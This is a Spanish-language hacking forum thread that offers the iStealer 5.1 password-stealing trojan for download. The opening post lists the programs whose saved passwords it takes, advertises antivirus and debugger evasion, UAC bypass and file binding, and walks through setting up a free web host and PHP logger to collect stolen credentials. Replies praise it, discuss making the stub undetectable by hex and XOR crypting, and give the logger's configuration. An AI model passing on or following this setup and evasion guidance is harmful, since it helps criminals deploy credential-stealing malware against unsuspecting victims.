esta herramienta roba contraseñas, a mi no me gusta postear herramientas de pago pero esta en publico
Recovery:

* Firefox (All versions)
Internet Explorer 7-8 New!
MSN Messenger (All versions)
Live Messenger 8-9
Google Talk
Trillian (Msn, Aim, Yahoo)
Pidgin / Gaim
Paltalk Scene New!
Steam
No-Ip
DynDNS
FileZilla
FlashFXP New!

Features:

* GUI coded in VB6
Stub coded in C/ASM
Stub size uncompressed: 19Kb
FUD (Runtime and Scantime)
Don't use external programs Important!
All strings encrypted
Bypass UAC in vista
Php log manager New!
File binder upto 25 Mb
Icon changer (Icons pack included)
Anti virtual machines
Anti OllyDbg
Anti WireShark New!
Anti Procmon
Melt
All encrypted
Good design

Paso 1:
Registro en [Enlace externo eliminado para invitados] (o otro webhost)

Paso 2:
Ir a UserCP. (control panel del webhost)
Haga clic en "Crear / eliminar bases de datos MySQL" (Create/delete MySQL database)

Nombre de la base de datos lo que quiere, va a incluir su nombre de usuario.
En este ejemplo mi nombre de usuario será "ejemplo".
Tengo mi base de datos denominada "ejemplo_db" J "
Presione "Crear la base de datos"
Ahora para el usuario, he llamado la mía "ejemplo_user"
La contraseña puede ser cualquier cosa, la mía será "passw0rd"
Presione "Crear" (Create User)

Para Asignar privilegios, asegúrese de que el usuario y la base de datos se seleccionan en la lista.
Cuando todas las casillas están marcadas, pulse "Asignar privilegios" (Assign Priviledges)

Paso 4:
Abrir \ iStealer5.1 \ PHP Logger \ index.php y editar la información de configuración. Abrir \ iStealer5.1 \ PHP Logger \ index.php
Toda la información que se comenta a un lado, está claro lo que es.

Paso 5:
ir al archivos de usuario en el PC y subir los archivos index.php y style.css al webhost
Después de esto, su iStealer está configurado, [Enlace externo eliminado para invitados]

Paso 6:
Abrir iStealer 5.0.1 y rellene todos los datos necesarios.
La "URL" es http://username.blackapplehost.com/index.php ( el username es el nombre de tu cuenta que puede ser lo que tu deseas)

Imagen

descarga >> [Enlace externo eliminado para invitados]
el archivo esta limpio , quien dice que esta infectado que ponga evidencia

saludos

Mostrar/Ocultar

Muy buenooo!! Ahora lo pruebo a ver q tal.
Thx!

Edit: Va como la seda!! Qué desfase!
Imagen

"Be the change you want to see in the world"
Muchas gracias m4rtyr, se ve muy bueno…
Saludos
-Aprovechemos mientras Windows es vulnerable.
-No hagas a otros lo que no te gustaría que hagan con.... tu mamá.
-El mejor Snifer es tu propio ISP.
A mi me encanta este stealer, hace tiempo que ando buscando un soft que me deje indetectable el server y no lo he podido encontrar.

¿Alguien sabe con dejo indetectable el server de este Stealer?

Saludos, :)
fíjate el nombre de este web indetectables.net ,
ir a viewforum.php?f=8 y busca los metodos de indetectar son Hex , Rit , Xor .....

saludos :)

Mostrar/Ocultar

si es la misma que la del source filtrado, segun los omentarios que viene dentro es la version 4
Saludos
Muchas gracias por el aporte m4rtyr. Lo he estado probando y va a las mil maravillas, eso sí, es bastante detectado así que habrá que meterle mano con el hex xD.
Para quien tenga dudas con el phplogger, es muy sencillo y ademas martyr se tomó las molestias de traducir las instrucciones.

Podeis usar cualquier hosting gratuito que os permita crear una base de datos, yo por ejemplo he utilizado una cuenta que tenia en funpic.de... está en alemán por lo que no se lo aconsejo a los principiantes, pero teneis otras muchas, solo teneis que usar google :).

Código: Seleccionar todo

$dbHost     = "localhost";	// Aquí debemos poner la ubicación de la base de datos, el valor por defecto es localhost, que usan la mayoría de los hostings, así que lo dejamos tal y como está.
$dbUser     = "juanito40";			// Aquí tienes que poner el nombre de usuario con el que accedes a la base de datos.
$dbPass     = "passw0rd";			// Aquí la contraseña del usuario con el que accedes a la base de datos.
$dbDatabase = "juanito40_01";		// Aquí debes poner el nombre que le pusiste a tu base de datos. Algunos hostings lo asignan directamente, suele ser tu nombre de usuario seguido de algún número.

$username   = "juanito";				
$password   = "contraseña";				
// Aquí debes poner un usuario y una contraseña cualquiera para acceder a los logs guardados (index.php), de lo contrario cualquiera podría acceder y ver toda la información contenida... nombres de usuario y contraseñas...
Una vez puesta la información subimos el index.php al hosting e intentamos acceder a él para ver si todo está correcto, si hay algún problema con la base de datos nos lo hará saber con un mensaje para que lo corrijamos.

A investigar... salu2
Responder

Volver a “Troyanos y Herramientas”